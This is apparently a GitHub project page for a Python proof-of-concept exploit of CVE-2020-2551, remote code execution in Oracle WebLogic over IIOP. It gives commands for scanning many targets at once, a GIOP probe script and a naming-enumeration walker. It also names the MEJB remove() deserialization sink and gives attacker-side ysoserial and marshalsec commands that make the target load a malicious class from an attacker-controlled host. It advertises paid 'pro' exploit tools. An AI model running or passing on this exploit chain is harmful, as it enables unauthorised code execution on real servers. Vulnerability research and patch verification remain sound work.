
crackercat / cve-2020-2552


This project forked from hktalent/cve-2020-2551


CVE-2020-2551 PoC exploit in Python: WebLogic RCE over IIOP, powered by 【劦久信安】. Online check:

Home Page: https://51pwn.com


cve-2020-2552's Introduction

Twitter: @Hktalent3135773

0、How to get the pro exploit tools?

See issue hktalent#5.

1、CVE-2020-2551

CVE-2020-2551 PoC exploit in Python. Keywords: GIOP, CORBA.

How to use

```sh
# single target
python3 CVE-2020-2551.py -u http://192.168.26.79:7001
# one target per line from a file, deduplicated
cat urls.txt|sort -u|xargs -I % python3 CVE-2020-2551.py -u %
# pull host URLs out of a saved HTML page
cat xxx.html|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|xargs -I % python3 CVE-2020-2551.py -u %
# 32-thread check; targets are piped on stdin
cat allXXurl.txt|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|python3 CVE-2020-2551.py -e
# results are written to data/*.txt
# Java checkers built against WebLogic 12.1.3.0 and 12.2.1.3.0: use the one matching
# the target version and pass one or more ip:port arguments
java -cp hktalent_51pwn_com_12.1.3.0_check.jar testiiop.ExpCVE20202551_names ip:port ip:port
java -cp hktalent_51pwn_com_12.2.1.3.0_check.jar testiiop.ExpCVE20202551_names ip:port ip:port
```

Supported protocols: t3, t3s, http, https, iiop, iiops

JMX service URL forms:

```
service:jmx:rmi://ip:port/jndi/iiop://ip:port/MBean-server-JNDI-name
service:jmx:iiop://ip:port/jndi/weblogic.management.mbeanservers.domainruntime
service:jmx:t3://ip:port/jndi/weblogic.management.mbeanservers.domainruntime
```
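Before pointing the PoC at a port, it is worth confirming that the port actually speaks IIOP rather than t3 or HTTP. The following is an added example (my code, not the project's script): it builds a GIOP 1.2 LocateRequest for the CosNaming root and parses the LocateReply that an IIOP listener sends back. The object key `NameService`, the host/port passed to `probe_iiop`, and the sample reply are assumptions and constructed data, not captures from a WebLogic server.

```python
import socket
import struct

# GIOP message_type values from the GIOP header (CORBA spec)
LOCATE_REQUEST = 3
LOCATE_REPLY = 4

# LocateStatusType_1_2 values carried in a LocateReply body (CORBA spec)
LOCATE_STATUS = {
    0: "UNKNOWN_OBJECT",
    1: "OBJECT_HERE",
    2: "OBJECT_FORWARD",
    3: "OBJECT_FORWARD_PERM",
    4: "LOC_SYSTEM_EXCEPTION",
    5: "LOC_NEEDS_ADDRESSING_MODE",
}

# Object key to locate. Assumption for this example: the standard CosNaming
# root key "NameService", which is what a JNDI iiop:// URL resolves first.
NAME_SERVICE_KEY = b"NameService"


def giop_header(msg_type, body_len, little_endian=False):
    """12-byte GIOP 1.2 header: magic, version 1.2, flags (bit 0 = byte order),
    message type, and body length in the declared byte order."""
    endian = "<" if little_endian else ">"
    flags = 0x01 if little_endian else 0x00
    return b"GIOP" + bytes([1, 2, flags, msg_type]) + struct.pack(endian + "I", body_len)


def build_locate_request(request_id, object_key=NAME_SERVICE_KEY, little_endian=False):
    """GIOP 1.2 LocateRequest for object_key, addressed with TargetAddress/KeyAddr.

    CDR layout of the body (offsets from the body start, which is 4-byte aligned):
      0  ulong   request_id
      4  short   TargetAddress discriminator (0 = KeyAddr)
      6  2 pad bytes so the following ulong is 4-byte aligned
      8  ulong   object_key length
      12 octet[] object_key
    """
    endian = "<" if little_endian else ">"
    body = struct.pack(endian + "IhxxI", request_id, 0, len(object_key)) + object_key
    return giop_header(LOCATE_REQUEST, len(body), little_endian) + body


def parse_giop_header(data):
    """Return (major, minor, little_endian, msg_type, body_len); ValueError if not GIOP."""
    if len(data) < 12 or data[:4] != b"GIOP":
        raise ValueError("not a GIOP message")
    major, minor, flags, msg_type = data[4], data[5], data[6], data[7]
    little_endian = bool(flags & 0x01)
    (body_len,) = struct.unpack(("<" if little_endian else ">") + "I", data[8:12])
    return major, minor, little_endian, msg_type, body_len


def parse_locate_reply(data):
    """Parse a GIOP 1.2 LocateReply into (request_id, status_name)."""
    _, _, little_endian, msg_type, body_len = parse_giop_header(data)
    if msg_type != LOCATE_REPLY or body_len < 8 or len(data) < 20:
        raise ValueError("not a LocateReply (message type %d)" % msg_type)
    request_id, status = struct.unpack(("<" if little_endian else ">") + "II", data[12:20])
    return request_id, LOCATE_STATUS.get(status, "UNKNOWN_STATUS_%d" % status)


def make_locate_reply(request_id, status, little_endian=False):
    """Build a LocateReply; used here only to construct sample replies offline."""
    endian = "<" if little_endian else ">"
    return giop_header(LOCATE_REPLY, 8, little_endian) + struct.pack(endian + "II", request_id, status)


# Constructed sample (not captured from a server): big-endian reply to
# request_id 1 saying the NameService object lives on this server.
SAMPLE_LOCATE_REPLY = make_locate_reply(1, 1)


def probe_iiop(host, port, timeout=5.0):
    """Send a LocateRequest for NameService and classify the answer.

    Returns "iiop:<status>" when the peer answers with a GIOP LocateReply,
    "iiop:type-N" for any other GIOP message, "not-giop" when the reply is
    not GIOP at all (e.g. an HTTP error page), and "closed" on connect/recv failure.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_locate_request(request_id=1))
            data = s.recv(4096)
    except OSError:
        return "closed"
    try:
        _, _, _, msg_type, _ = parse_giop_header(data)
        if msg_type == LOCATE_REPLY:
            return "iiop:" + parse_locate_reply(data)[1]
        return "iiop:type-%d" % msg_type
    except ValueError:
        return "not-giop"


if __name__ == "__main__":
    print(build_locate_request(1).hex())
    print(parse_locate_reply(SAMPLE_LOCATE_REPLY))  # (1, 'OBJECT_HERE')
```

An `OBJECT_HERE` or `OBJECT_FORWARD` status from a WebLogic port means an IIOP listener is exposed and the iiop:// JMX URL forms above are reachable; a port that only speaks t3 or HTTP will not return a GIOP frame at all.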

poc

[screenshot of the PoC run; image not included]

2、You know what you are doing

Result of enumerating the root naming context over IIOP. Entries of class com.sun.jndi.cosnaming.CNCtx are sub-contexts, entries of class com.sun.corba.se.impl.corba.CORBAObjectImpl are bound objects, and an "error msg" of org.omg.CORBA.NO_PERMISSION marks a context the anonymous caller is not allowed to list:

```json
{
    "ejb": {
        "class": "com.sun.jndi.cosnaming.CNCtx",
        "interfaces": [
            "javax.naming.Context"
        ],
        "mgmt": {
            "MEJB": {
                "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
                "interfaces": []
            },
            "class": "com.sun.jndi.cosnaming.CNCtx",
            "interfaces": [
                "javax.naming.Context"
            ]
        }
    },
    "javax": {
        "class": "com.sun.jndi.cosnaming.CNCtx",
        "error msg": "org.omg.CORBA.NO_PERMISSION:   vmcid: 0x0  minor code: 0  completed: No",
        "interfaces": [
            "javax.naming.Context"
        ]
    },
    "jdbc": {
        "class": "com.sun.jndi.cosnaming.CNCtx",
        "db_xf": {
            "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
            "interfaces": []
        },
        "interfaces": [
            "javax.naming.Context"
        ]
    },
    "mejbmejb_jarMejb_EO": {
        "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
        "interfaces": []
    },
    "weblogic": {
        "class": "com.sun.jndi.cosnaming.CNCtx",
        "error msg": "org.omg.CORBA.NO_PERMISSION:   vmcid: 0x0  minor code: 0  completed: No",
        "interfaces": [
            "javax.naming.Context"
        ]
    }
}
```
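The dump above is only useful once it is turned into lookup paths. As an added example (my code, not the project's), the walker below reads the enumeration output in the format shown in section 2, separates sub-contexts, bound CORBA objects and contexts that failed with NO_PERMISSION, and lists the bound objects whose name looks like the Management EJB. The dump is embedded verbatim so it runs offline; the "mejb" name match is a heuristic of this example, not something the page defines.

```python
import json

# Keys the dump uses for node metadata; every other key is a child binding name.
META_KEYS = {"class", "interfaces", "error msg"}
CONTEXT_CLASS = "com.sun.jndi.cosnaming.CNCtx"

# The enumeration dump from section 2, embedded so the walker runs offline.
NAMING_DUMP = json.loads('''
{"ejb": {"class": "com.sun.jndi.cosnaming.CNCtx", "interfaces": ["javax.naming.Context"],
         "mgmt": {"class": "com.sun.jndi.cosnaming.CNCtx", "interfaces": ["javax.naming.Context"],
                  "MEJB": {"class": "com.sun.corba.se.impl.corba.CORBAObjectImpl", "interfaces": []}}},
 "javax": {"class": "com.sun.jndi.cosnaming.CNCtx", "interfaces": ["javax.naming.Context"],
           "error msg": "org.omg.CORBA.NO_PERMISSION:   vmcid: 0x0  minor code: 0  completed: No"},
 "jdbc": {"class": "com.sun.jndi.cosnaming.CNCtx", "interfaces": ["javax.naming.Context"],
          "db_xf": {"class": "com.sun.corba.se.impl.corba.CORBAObjectImpl", "interfaces": []}},
 "mejbmejb_jarMejb_EO": {"class": "com.sun.corba.se.impl.corba.CORBAObjectImpl", "interfaces": []},
 "weblogic": {"class": "com.sun.jndi.cosnaming.CNCtx", "interfaces": ["javax.naming.Context"],
              "error msg": "org.omg.CORBA.NO_PERMISSION:   vmcid: 0x0  minor code: 0  completed: No"}}
''')


def walk(node, prefix=""):
    """Yield (path, kind, detail) for every binding below node, depth first.

    kind is "context" for a CosNaming sub-context (class CNCtx), "denied" for a
    context whose listing failed (the dump records the exception under
    "error msg"), and "object" for anything else, i.e. a bound CORBA object.
    Paths use "/" so they can be passed straight to a JNDI lookup.
    """
    for name in sorted(k for k in node if k not in META_KEYS):
        child = node[name]
        path = prefix + "/" + name if prefix else name
        if child.get("class") == CONTEXT_CLASS:
            if "error msg" in child:
                yield path, "denied", child["error msg"]
            else:
                yield path, "context", ""
            # a denied context normally has no children, but walk it anyway
            yield from walk(child, path)
        else:
            yield path, "object", child.get("class", "")


def classify(tree):
    """Group every binding path by kind."""
    out = {"context": [], "object": [], "denied": []}
    for path, kind, _ in walk(tree):
        out[kind].append(path)
    return out


def mejb_candidates(tree):
    """Bound objects whose last path component contains 'mejb' (case-insensitive).

    Heuristic of this example: these are the candidates for the MEJB lookup
    that section 4 performs with ejb/mgmt/MEJB.
    """
    return [path for path, kind, _ in walk(tree)
            if kind == "object" and "mejb" in path.rsplit("/", 1)[-1].lower()]


if __name__ == "__main__":
    for kind, paths in classify(NAMING_DUMP).items():
        print("%-8s %s" % (kind, ", ".join(paths)))
    print("MEJB candidates:", mejb_candidates(NAMING_DUMP))
```

On the dump from the page this yields ejb/mgmt/MEJB, jdbc/db_xf and mejbmejb_jarMejb_EO as bound objects, javax and weblogic as contexts the anonymous caller may not list, and ejb/mgmt/MEJB plus mejbmejb_jarMejb_EO as MEJB candidates.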

3、ejb

Class codebase path of the Management EJB (MEJB) on the server:

/bea_wls_internal/classes/mejb@/

Target method; the payload object is passed as its obj argument, which the server unmarshals (see section 4):

weblogic.management.j2ee.mejb.Mejb_dj*#remove(Object obj)

4、jta

Look up the MEJB through the naming context (x) and pass the payload object (jta) as the argument of remove:

```java
x.lookup("ejb/mgmt/MEJB").remove(jta);
```

5、logs

  • fix: the RMI path using the ysoserial Jdk7u21 payload does not work against a remote JDK 8; do not use it:

```sh
java -cp $mtx/../tools/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 'whoami'
```

  • use XXclass.class compiled with JDK 6 instead (class file version 50, so any newer target JVM can load it), served from http://YourIP:port/ and referenced through marshalsec's RMIRefServer:

```sh
java -cp $mtx/../tools/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer 'http://YourIP:port/#XXclass' 1099
```

Remote class loading through an RMI JNDI reference only works when com.sun.jndi.rmi.object.trustURLCodebase is true on the target JVM, which is the default only before JDK 8u121.

6、Thanks to

@r4v3zn @0nise

cve-2020-2552's People

Contributors: hktalent, pwnedanything
